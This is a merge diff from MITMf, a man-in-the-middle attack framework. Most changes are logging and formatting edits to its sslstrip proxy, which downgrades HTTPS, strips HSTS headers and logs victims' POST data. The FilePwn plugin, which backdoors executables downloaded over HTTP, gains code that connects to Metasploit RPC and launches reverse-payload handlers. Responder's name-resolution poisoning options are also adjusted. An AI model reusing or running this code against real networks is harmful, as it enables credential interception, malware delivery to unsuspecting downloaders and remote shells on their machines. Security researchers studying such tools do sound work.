Merge branch 'dev'

core/sslstrip/ClientRequest.py

@@ -72,7 +72,7 @@ class ClientRequest(Request):
             if 'referer' in headers:
                 real = self.urlMonitor.real
                 if len(real) > 0:
-                    dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
+                    dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
                     headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
 
             if 'if-none-match' in headers:
@@ -80,13 +80,13 @@ class ClientRequest(Request):
 
             if 'host' in headers:
                 host = self.urlMonitor.URLgetRealHost(str(headers['host']))
-                mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host))
+                mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
                 headers['host'] = host
                 self.setHeader('Host', host)
 
         if 'accept-encoding' in headers:
              del headers['accept-encoding']
-             mitmf_logger.debug("Zapped encoding")
+             mitmf_logger.debug("[ClientRequest] Zapped encoding")
 
         if 'if-modified-since' in headers:
             del headers['if-modified-since']
@@ -117,7 +117,7 @@ class ClientRequest(Request):
         return "lock.ico"        
 
     def handleHostResolvedSuccess(self, address):
-        mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
+        mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
         host              = self.getHeader("host")
         headers           = self.cleanHeaders()
         client            = self.getClientIP()
@@ -138,13 +138,13 @@ class ClientRequest(Request):
             url       = 'http://' + host + path
             self.uri  = url # set URI to absolute
 
-            if len(real) > 0:
+            if real:
-                dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
+                dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
                 path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
                 postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
                 
-                if len(patchDict) > 0:
+                if patchDict:
-                    dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
+                    dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
                     postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
 
             
@@ -155,22 +155,22 @@ class ClientRequest(Request):
         self.dnsCache.cacheResolution(hostparts[0], address)
 
         if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
-            mitmf_logger.debug("Sending expired cookies...")
+            mitmf_logger.debug("[ClientRequest] Sending expired cookies")
             self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
         
         elif (self.urlMonitor.isSecureFavicon(client, path)):
-            mitmf_logger.debug("Sending spoofed favicon response...")
+            mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response")
             self.sendSpoofedFaviconResponse()
 
         elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
             if 'securelink' in headers:
                 del headers['securelink']
             
-            mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url))
+            mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
             self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
         
         else:
-            mitmf_logger.debug("Sending request via HTTP...")
+            mitmf_logger.debug("[ClientRequest] Sending request via HTTP")
             #self.proxyViaHTTP(address, self.method, path, postData, headers)
             port = 80
             if len(hostparts) > 1:
@@ -189,7 +189,7 @@ class ClientRequest(Request):
         address = self.dnsCache.getCachedAddress(host)
 
         if address != None:
-            mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address)))
+            mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, str(address)))
             return defer.succeed(address)
         else:
             
@@ -197,20 +197,22 @@ class ClientRequest(Request):
             
             if self.resolver == 'dnschef':
                 try:
+                    mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
                     address = str(self.customResolver.query(host)[0].address)
                     return defer.succeed(address)
                 except Exception:
-                    return defer.fail()
+                    mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
-            
+                    return reactor.resolve(host)
+
             elif self.resolver == 'twisted':
                 return reactor.resolve(host)
 
     def process(self):
-        mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host')))
+        mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
         host = self.getHeader('host').split(":")[0]
 
         if self.hsts:
-            host = self.urlMonitor.URLgetRealHost("%s"%host)                 
+            host = self.urlMonitor.URLgetRealHost(str(host))                
 
         deferred = self.resolveHost(host)
         deferred.addCallback(self.handleHostResolvedSuccess)

core/sslstrip/ServerConnection.py

@@ -70,18 +70,18 @@ class ServerConnection(HTTPClient):
         if self.command == 'GET':
             try:
                 user_agent = parse(self.headers['user-agent'])
-                self.clientInfo = "%s [type:%s-%s os:%s] "  % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
+                self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
             except:
-                self.clientInfo = "%s " % self.client.getClientIP()
+                self.clientInfo = "{} ".format(self.client.getClientIP())
 
-            mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
+            mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
 
         self.plugins.hook()
         self.sendCommand(self.command, self.uri)
 
     def sendHeaders(self):
         for header, value in self.headers.iteritems():
-            mitmf_logger.debug("Sending header: (%s => %s)" % (header, value))
+            mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value))
             self.sendHeader(header, value)
 
         self.endHeaders()
@@ -92,11 +92,11 @@ class ServerConnection(HTTPClient):
         elif 'keylog' in self.uri:
             self.plugins.hook()
         else:
-            mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
+            mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
             self.transport.write(self.postData)
 
     def connectionMade(self):
-        mitmf_logger.debug("HTTP connection made.")
+        mitmf_logger.debug("[ServerConnection] HTTP connection made.")
         self.plugins.hook()
         self.sendRequest()
         self.sendHeaders()
@@ -105,11 +105,11 @@ class ServerConnection(HTTPClient):
             self.sendPostData()
 
     def handleStatus(self, version, code, message):
-        mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message))
+        mitmf_logger.debug("[ServerConnection] Got server response: {0} {1} {2}".format(version, code, message))
         self.client.setResponseCode(int(code), message)
 
     def handleHeader(self, key, value):
-        mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value))
+        mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value))
 
         if (key.lower() == 'location'):
             value = self.replaceSecureLinks(value)
@@ -119,15 +119,15 @@ class ServerConnection(HTTPClient):
         if (key.lower() == 'content-type'):
             if (value.find('image') != -1):
                 self.isImageRequest = True
-                mitmf_logger.debug("Response is image content, not scanning...")
+                mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...")
 
         if (key.lower() == 'content-encoding'):
             if (value.find('gzip') != -1):
-                mitmf_logger.debug("Response is compressed...")
+                mitmf_logger.debug("[ServerConnection] Response is compressed...")
                 self.isCompressed = True
 
         elif (key.lower()== 'strict-transport-security'):
-            mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP())
+            mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP()))
 
         elif (key.lower() == 'content-length'):
             self.contentLength = value
@@ -164,10 +164,11 @@ class ServerConnection(HTTPClient):
 
     def handleResponse(self, data):
         if (self.isCompressed):
-            mitmf_logger.debug("Decompressing content...")
+            mitmf_logger.debug("[ServerConnection] Decompressing content...")
             data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
             
         #mitmf_logger.debug("Read from server:\n" + data)
+        mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
 
         data = self.replaceSecureLinks(data)
         res = self.plugins.hook()
@@ -184,7 +185,7 @@ class ServerConnection(HTTPClient):
         try:
             self.shutdown()
         except:
-            mitmf_logger.info("Client connection dropped before request finished.")
+            mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
 
     def replaceSecureLinks(self, data):
         if self.hsts:
@@ -193,7 +194,7 @@ class ServerConnection(HTTPClient):
             patchDict = self.urlMonitor.patchDict
 
             if len(patchDict)>0:
-                dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
+                dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
                 data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
 
             iterator = re.finditer(ServerConnection.urlExpression, data)       
@@ -202,13 +203,13 @@ class ServerConnection(HTTPClient):
 
                 mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
                 nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
-                mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl))
+                mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
                 sustitucion[url] = nuevaurl
                 #data.replace(url,nuevaurl)
 
             #data = self.urlMonitor.DataReemplazo(data)
             if len(sustitucion)>0:
-                dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
+                dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
                 data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
 
             #mitmf_logger.debug("HSTS DEBUG received data:\n"+data)   
@@ -227,7 +228,7 @@ class ServerConnection(HTTPClient):
             for match in iterator:
                 url = match.group()
 
-                mitmf_logger.debug("Found secure reference: " + url)
+                mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
 
                 url = url.replace('https://', 'http://', 1)
                 url = url.replace('&', '&')

mitmf.py

@@ -52,7 +52,7 @@ Banners().printBanner()
 if os.geteuid() != 0:
     sys.exit("[-] When man-in-the-middle you want, run as r00t you will, hmm?")
 
-parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, version=mitmf_version, usage='', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
+parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
 #add MITMf options
 mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
 mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
@@ -80,29 +80,29 @@ try:
     for p in plugin_classes:
         plugins.append(p())
 except:
-    print "Failed to load plugin class %s" % str(p)
+    print "Failed to load plugin class {}".format(p)
 
 #Give subgroup to each plugin with options
 try:
     for p in plugins:
         if p.desc == "":
-            sgroup = parser.add_argument_group("%s" % p.name,"Options for %s." % p.name)
+            sgroup = parser.add_argument_group(p.name,"Options for {}.".format(p.name))
         else:
-            sgroup = parser.add_argument_group("%s" % p.name, p.desc)
+            sgroup = parser.add_argument_group(p.name, p.desc)
 
-        sgroup.add_argument("--%s" % p.optname, action="store_true",help="Load plugin %s" % p.name)
+        sgroup.add_argument("--{}".format(p.optname), action="store_true",help="Load plugin {}".format(p.name))
 
         if p.has_opts:
             p.add_options(sgroup)
 except NotImplementedError:
-    sys.exit("[-] %s plugin claimed option support, but didn't have it." % p.name)
+    sys.exit("[-] {} plugin claimed option support, but didn't have it.".format(p.name))
 
 args = parser.parse_args()
 
 try:
     configfile = ConfigObj(args.configfile)
 except Exception, e:
-    sys.exit("[-] Error parsing config file: " + str(e))
+    sys.exit("[-] Error parsing config file: {}".format(e))
 
 config_args = configfile['MITMf']['args']
 if config_args:
@@ -117,14 +117,14 @@ if config_args:
 try:
     args.ip_address = get_if_addr(args.interface)
     if (args.ip_address == "0.0.0.0") or (args.ip_address is None):
-        sys.exit("[-] Interface %s does not have an assigned IP address" % args.interface)
+        sys.exit("[-] Interface {} does not have an assigned IP address".format(args.interface))
 except Exception, e:
-    sys.exit("[-] Error retrieving interface IP address: %s" % e)
+    sys.exit("[-] Error retrieving interface IP address: {}".format(e))
 
 try:
     args.mac_address = get_if_hwaddr(args.interface)
 except Exception, e:
-    sys.exit("[-] Error retrieving interface MAC address: %s" % e)
+    sys.exit("[-] Error retrieving interface MAC address: {}".format(e))
 
 args.configfile = configfile #so we can pass the configobj down to all the plugins
 
@@ -144,17 +144,18 @@ mitmf_logger.addHandler(fileHandler)
 #####################################################################################################
 
 #All our options should be loaded now, pass them onto plugins
-print "[*] MITMf v%s online... initializing plugins" % mitmf_version
+print "[*] MITMf v{} online... initializing plugins".format(mitmf_version)
 
 load = []
 
 for p in plugins:
 
     if vars(args)[p.optname] is True:
-        print "|_ %s v%s" % (p.name, p.version)
+
+        print "|_ {} v{}".format(p.name, p.version)
         if hasattr(p, 'tree_output') and p.tree_output:
             for line in p.tree_output:
-                print "|  |_ %s" % line
+                print "|  |_ {}".format(line)
                 p.tree_output.remove(line)
 
     if getattr(args, p.optname):
@@ -164,7 +165,7 @@ for p in plugins:
     if vars(args)[p.optname] is True:
         if hasattr(p, 'tree_output') and p.tree_output:
             for line in p.tree_output:
-                print "|  |_ %s" % line
+                print "|  |_ {}".format(line)
 
 #Plugins are ready to go, start MITMf
 if args.disproxy:
@@ -200,9 +201,9 @@ else:
                 p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
 
     print "|"
-    print "|_ Sergio-Proxy v%s online" % sergio_version
+    print "|_ Sergio-Proxy v{} online".format(sergio_version)
-    print "|_ SSLstrip v%s by Moxie Marlinspike online" % sslstrip_version
+    print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version)
-    print "|_ DNSChef v%s online\n" % dnschef_version
+    print "|_ DNSChef v{} online\n".format(dnschef_version)
 
 reactor.run()
 

plugins/FilePwn.py

@@ -67,6 +67,7 @@ import multiprocessing
 from libs.bdfactory import pebin
 from libs.bdfactory import elfbin
 from libs.bdfactory import machobin
+from core.msfrpc import Msfrpc
 from plugins.plugin import Plugin
 from tempfile import mkstemp
 from configobj import ConfigObj
@@ -79,7 +80,7 @@ class FilePwn(Plugin):
     desc        = "Backdoor executables being sent over http using bdfactory"
     implements  = ["handleResponse"]
     tree_output = ["BDFProxy v0.3.2 online"]
-    version     = "0.2"
+    version     = "0.3"
     has_opts    = False
 
     def initialize(self, options):
@@ -109,6 +110,20 @@ class FilePwn(Plugin):
         #NOT USED NOW
         #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
 
+        #Metasploit options
+        msfcfg  = options.configfile['MITMf']['Metasploit']
+        rpcip   = msfcfg['rpcip']
+        rpcpass = msfcfg['rpcpass']
+
+        try:
+            self.msf = Msfrpc({"host": rpcip})  #create an instance of msfrpc libarary
+            self.msf.login('msf', rpcpass)
+            version = self.msf.call('core.version')['version']
+            self.tree_output.append("Connected to Metasploit v%s" % version)
+        except Exception:
+            sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
+
+        #FilePwn options
         self.userConfig      = options.configfile['FilePwn']
         self.FileSizeMax     = self.userConfig['targets']['ALL']['FileSizeMax']
         self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
@@ -123,6 +138,32 @@ class FilePwn(Plugin):
         self.zipblacklist    = self.userConfig['ZIP']['blacklist']
         self.tarblacklist    = self.userConfig['TAR']['blacklist']
 
+        self.tree_output.append("Setting up Metasploit payload handlers")
+        
+        jobs = self.msf.call('job.list')
+        for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
+            cmd = "use exploit/multi/handler\n"
+            cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
+            cmd += "set LHOST {}\n".format(config["HOST"])
+            cmd += "set LPORT {}\n".format(config["PORT"])
+            cmd += "exploit -j\n"
+
+            if jobs:
+                for pid, name in jobs.iteritems():
+                    info = self.msf.call('job.info', [pid])
+                    if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
+                        #Create a virtual console
+                        c_id = self.msf.call('console.create')['id']
+
+                        #write the cmd to the newly created console
+                        self.msf.call('console.write', [c_id, cmd])
+            else:
+                #Create a virtual console
+                c_id = self.msf.call('console.create')['id']
+
+                #write the cmd to the newly created console
+                self.msf.call('console.write', [c_id, cmd])
+
     def convert_to_Bool(self, aString):
         if aString.lower() == 'true':
             return True
@@ -300,7 +341,7 @@ class FilePwn(Plugin):
 
         except Exception as e:
             print 'Exception', str(e)
-            mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e))
+            mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
             return None
 
     def tar_files(self, aTarFileBytes, formatt):

plugins/JavaPwn.py

@@ -18,13 +18,13 @@
 # USA
 #
 
-import core.msfrpc as msfrpc
 import string
 import random
 import threading
 import sys
 import logging
 
+from core.msfrpc import Msfrpc
 from plugins.plugin import Plugin
 from plugins.BrowserProfiler import BrowserProfiler
 from time import sleep
@@ -71,7 +71,7 @@ class JavaPwn(BrowserProfiler, Plugin):
         self.black_ips = []
 
         try:
-            msf = msfrpc.Msfrpc({"host": self.rpcip})  #create an instance of msfrpc libarary
+            msf = Msfrpc({"host": self.rpcip})  #create an instance of msfrpc libarary
             msf.login('msf', self.rpcpass)
             version = msf.call('core.version')['version']
             self.tree_output.append("Connected to Metasploit v%s" % version)
@@ -233,20 +233,3 @@ class JavaPwn(BrowserProfiler, Plugin):
                         self.send_command(cmd, msf, vic_ip)
                         self.injectWait(msf, rand_url, vic_ip)
             sleep(1)
-
-    def finish(self):
-        '''This will be called when shutting down'''
-        msf = msfrpc.Msfrpc({"host": self.rpcip})
-        msf.login('msf', self.rpcpass)
-
-        jobs = msf.call('job.list')
-        if len(jobs) > 0:
-            print '\n[*] Stopping all running metasploit jobs'
-            for k, v in jobs.iteritems():
-                msf.call('job.stop', [k])
-
-        consoles = msf.call('console.list')['consoles']
-        if len(consoles) > 0:
-            print "[*] Closing all virtual consoles"
-            for console in consoles:
-                msf.call('console.destroy', [console['id']])

plugins/Responder.py

@@ -45,25 +45,25 @@ class Responder(Plugin):
         except Exception, e:
             sys.exit('[-] Error parsing config for Responder: ' + str(e))
 
-        if options.Analyse:
+        if options.Analyze:
             self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
 
-        resp = ResponderMITMf()
+        resp = ResponderMITMf(options, config)
-        resp.setCoreVars(options, config)
+        #resp.setCoreVars(options, config)
 
-        result = resp.AnalyzeICMPRedirect()
+        result = resp.AnalyzeICMPRedirect(options.Analyze)
         if result:
             for line in result:
                 self.tree_output.append(line)
 
-        resp.printDebugInfo()
+        #resp.printDebugInfo()
         resp.start()
 
     def plugin_reactor(self, strippingFactory):
         reactor.listenTCP(3141, strippingFactory)
 
     def add_options(self, options):
-        options.add_argument('--analyze', dest="Analyse", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
+        options.add_argument('--analyze', dest="Analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
         options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
         options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
         options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")